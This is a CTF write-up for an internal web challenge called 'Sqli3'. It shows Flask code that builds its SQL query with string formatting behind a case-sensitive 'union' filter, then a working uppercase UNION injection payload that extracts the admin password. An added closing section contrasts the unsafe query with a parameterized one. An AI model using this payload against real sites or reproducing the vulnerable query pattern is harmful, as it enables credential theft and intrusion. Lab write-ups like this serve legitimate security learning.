Web Hacking/SWLUG Internal CTF

[SWLUG] Sqli3 - write up

hanbunny 2025. 4. 14. 11:24

🐰 Start!

This screen appears when you start.
I opened the source code first.

from flask import Flask, request, g
import mysql.connector

app = Flask(__name__)

def get_db():
    if 'db' not in g:
        g.db = mysql.connector.connect(
            host='db',  # Docker Compose service name
            user='root',
            password='toor',
            database='sqli'
        )
    return g.db

@app.teardown_appcontext
def close_db(exception):
    db = g.pop('db', None)
    if db is not None:
        db.close()

@app.route('/')
def index():
    uid = request.args.get('uid')
    upw = request.args.get('upw')
    if uid is not None:
        if 'union' in uid:
            return "<h3>No Hack~!~!</h3>"
    if upw is not None:
        if 'union' in upw:
            return "<h3>No Hack~!~!</h3>"

    query = f"SELECT * FROM sqli3 WHERE uid='{uid}' AND upw='{upw}'"
    print(query)  # For debugging

    cur = get_db().cursor()
    try:
        cur.execute(query)
        result = cur.fetchone()
    except mysql.connector.Error as e:
        return f"<h3>Database error: {e}</h3>"

    if result:
        output = f"<h3>Hello! {result[3]}</h3>"
    else:
        output = "<h3>Invalid credentials</h3>"

    return f"""
        <h1>level 3</h1>
        <p><b>Query:</b> {query}</p>
        <p><b>Result:</b> {output}</p>
    """

if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0')

@app.route('/')
def index():
    uid = request.args.get('uid')
    upw = request.args.get('upw')
    if uid is not None:
        if 'union' in uid:
            return "<h3>No Hack~!~!</h3>"
    if upw is not None:
        if 'union' in upw:
            return "<h3>No Hack~!~!</h3>"

Looking at this part, it blocks input containing the string union.
If union is included in uid or upw, it returns No Hack!!.
So I first tried bypassing it by entering it in uppercase.

Attempt 1)
?uid=' UNION select 1, 2, 3,(select upw from sqli3 where uid='admin' ) # entered

Got the FLAG.
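The defensive takeaway, as an added example that is not part of the post or the challenge code: the challenge's check is a case-sensitive substring match, so a keyword blacklist can never be the fix, while a parameterized query keeps the input as data regardless of case. It uses an in-memory sqlite3 table as a stand-in for the challenge's MySQL database (an assumption; the column layout and rows are constructed, and sqlite uses `--` rather than `#` for comments).

```python
import sqlite3

def make_db():
    # Constructed stand-in for the challenge's sqli3 table (assumed columns: id, uid, upw, name).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sqli3 (id INTEGER, uid TEXT, upw TEXT, name TEXT)")
    conn.execute("INSERT INTO sqli3 VALUES (1, 'admin', 'FLAG{constructed}', 'Administrator')")
    conn.execute("INSERT INTO sqli3 VALUES (2, 'guest', 'guest', 'Guest')")
    conn.commit()
    return conn

def blocked_by_filter(value):
    # The challenge's check: a case-sensitive substring test, so 'UNION' slips through.
    return value is not None and 'union' in value

def login_unsafe(conn, uid, upw):
    # String-built query exactly as in the challenge source; the filter is the only "defence".
    if blocked_by_filter(uid) or blocked_by_filter(upw):
        return "No Hack~!~!"
    query = f"SELECT * FROM sqli3 WHERE uid='{uid}' AND upw='{upw}'"
    row = conn.execute(query).fetchone()
    return row[3] if row else None   # result[3] is the name column, as in the challenge

def login_safe(conn, uid, upw):
    # Hardened form: placeholders bind the input as values, so no blacklist is needed at all.
    row = conn.execute(
        "SELECT * FROM sqli3 WHERE uid=? AND upw=?", (uid, upw)
    ).fetchone()
    return row[3] if row else None
```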